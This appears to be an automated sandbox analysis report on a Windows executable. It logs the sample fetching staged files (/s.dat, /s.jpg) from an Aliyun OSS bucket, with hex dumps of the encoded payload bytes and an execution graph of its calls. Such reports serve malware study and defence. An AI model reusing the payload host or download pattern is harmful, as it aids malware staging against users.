                                            2025-01-09 03:28:38 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                            Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                            2025-01-09 03:28:38 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                            Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                            2025-01-09 03:28:38 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                            Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                            2025-01-09 03:28:38 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                            Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                            2025-01-09 03:28:38 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                            Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.74968659.110.190.444434476C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-09 03:28:46 UTC111OUTGET /s.dat HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:46 UTC559INHTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:46 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 28272
                                            Connection: close
                                            x-oss-request-id: 677F426E7A62AC34343443D0
                                            Accept-Ranges: bytes
                                            ETag: "B2F6434FC09C8461DE3CEAEE40EAF4AC"
                                            Last-Modified: Thu, 09 Jan 2025 03:28:24 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 4321761407660281176
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000113
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: svZDT8CchGHePOruQOr0rA==
                                            x-oss-server-time: 7
                                            2025-01-09 03:28:46 UTC3537INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                            Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                            2025-01-09 03:28:46 UTC4096INData Raw: 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 92
                                            Data Ascii: ##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                            2025-01-09 03:28:46 UTC4096INData Raw: 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc 3c
                                            Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH<
                                            2025-01-09 03:28:46 UTC4096INData Raw: 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 0b
                                            Data Ascii: JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                            2025-01-09 03:28:46 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                            Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                            2025-01-09 03:28:46 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                            Data Ascii: ,$LDld=5}u]U
                                            2025-01-09 03:28:46 UTC4096INData Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed
                                            Data Ascii: <EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                            2025-01-09 03:28:46 UTC159INData Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 cf a9 e3 01
                                            Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.74968759.110.190.444434476C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-09 03:28:48 UTC111OUTGET /s.jpg HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:48 UTC544INHTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:48 GMT
                                            Content-Type: image/jpeg
                                            Content-Length: 8299
                                            Connection: close
                                            x-oss-request-id: 677F42709932F13631DB3F2E
                                            Accept-Ranges: bytes
                                            ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 692387538176721524
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                            x-oss-server-time: 16
                                            2025-01-09 03:28:48 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                            Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                            2025-01-09 03:28:48 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                            Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                            2025-01-09 03:28:48 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                            Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                            Click to jump to process

                                            Click to jump to process

                                            • File
                                            • Registry

                                            Click to dive into process behavior distribution

                                            Target ID:0
                                            Start time:22:27:05
                                            Start date:08/01/2025
                                            Path:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\2362476847-83854387.07.exe"
                                            Imagebase:0x140000000
                                            File size:30'958'080 bytes
                                            MD5 hash:D7FBF8A45EA736F05B15DE0C985B343D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                            Execution Graph

                                            Execution Coverage

                                            Dynamic/Packed Code Coverage

                                            Signature Coverage

                                            Execution Coverage:2.1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:32%
                                            Total number of Nodes:462
                                            Total number of Limit Nodes:7
                                            Show Legend
                                            Hide Nodes/Edges
                                            execution_graph 13965 140005df3 13966 140005e71 13965->13966 13967 140005e84 CreateFileA 13966->13967 13968 140005f50 _CreateFrameInfo 13967->13968 13969 140005fc3 malloc ReadFile 13968->13969 15138 140007412 15141 140007333 15138->15141 15139 140007403 15140 1400073e0 LdrLoadDll 15140->15141 15141->15139 15141->15140 15537 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15540 1400054e0 15537->15540 15539 1400136ef 15541 14000552c 15540->15541 15544 140005506 sprintf_s 15540->15544 15542 1400074d0 LdrLoadDll 15541->15542 15543 140005536 15542->15543 15545 140008370 3 API calls 15543->15545 15544->15539 15549 140005545 _CreateFrameInfo 15545->15549 15546 1400055b8 15547 140008de0 _lock 2 API calls 15546->15547 15548 1400055c0 sprintf_s 15547->15548 15548->15544 15549->15546 15550 1400074f0 LdrLoadDll 15549->15550 15551 140005561 CreateThread 15550->15551 15551->15548 15552 1400055b0 GetLastError 15551->15552 15552->15546 13974 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13975 140005ab1 13974->13975 13976 140005add GetVersionExA 13974->13976 13979 140005abf 13975->13979 14024 140009540 13975->14024 13977 140005b0e GetProcessHeap HeapFree 13976->13977 13978 140005af0 GetProcessHeap HeapFree 13976->13978 13984 140005b3c 13977->13984 13982 140005d0b 13978->13982 14032 140009300 13979->14032 13983 140005ac9 14043 140008510 GetModuleHandleA 13983->14043 14047 14000a310 HeapCreate 13984->14047 13987 140005ad3 13987->13982 13988 140005bec 13989 140005c12 13988->13989 13990 140005bf0 13988->13990 13994 140005c17 13989->13994 13991 140005bfe 13990->13991 13992 140009540 _lock 12 API calls 13990->13992 13993 140009300 _lock 10 API calls 13991->13993 13992->13991 13996 140005c08 13993->13996 13995 140005c3d 13994->13995 13997 140005c29 13994->13997 13999 140009540 _lock 12 API calls 13994->13999 14050 140009f50 GetStartupInfoA 13995->14050 13998 140008510 _lock 3 API calls 13996->13998 14000 140009300 _lock 10 API calls 13997->14000 13998->13989 13999->13997 14001 140005c33 14000->14001 14003 140008510 _lock 3 API calls 14001->14003 14003->13995 14005 140005c56 14070 140009e30 14005->14070 14008 140005c5b 14088 140009c30 14008->14088 14012 140005c73 14013 140005c81 14012->14013 14014 1400084e0 _lock 12 API calls 14012->14014 14118 140009690 14013->14118 14014->14013 14016 140005c86 14017 140005c94 14016->14017 14018 1400084e0 _lock 12 API calls 14016->14018 14130 140008650 14017->14130 14018->14017 14020 140005c9e 14021 1400084e0 _lock 12 API calls 14020->14021 14022 140005ca9 14020->14022 14021->14022 14134 140001520 14022->14134 14025 14000954e _lock 14024->14025 14026 14000959c 14025->14026 14028 14000961c 14025->14028 14029 1400095c9 GetStdHandle 14025->14029 14027 140009300 _lock 10 API calls 14026->14027 14027->14028 14028->13979 14029->14026 14030 1400095dc 14029->14030 14030->14026 14031 1400095e2 WriteFile 14030->14031 14031->14026 14036 140009320 _lock 14032->14036 14033 140009330 14033->13983 14034 1400094dc GetStdHandle 14034->14033 14035 1400094ef 14034->14035 14035->14033 14037 1400094f5 WriteFile 14035->14037 14036->14033 14036->14034 14038 140009375 _lock 14036->14038 14037->14033 14038->14033 14039 1400093b9 GetModuleFileNameA 14038->14039 14040 1400093d9 _lock 14039->14040 14152 14000f000 14040->14152 14044 140008543 ExitProcess 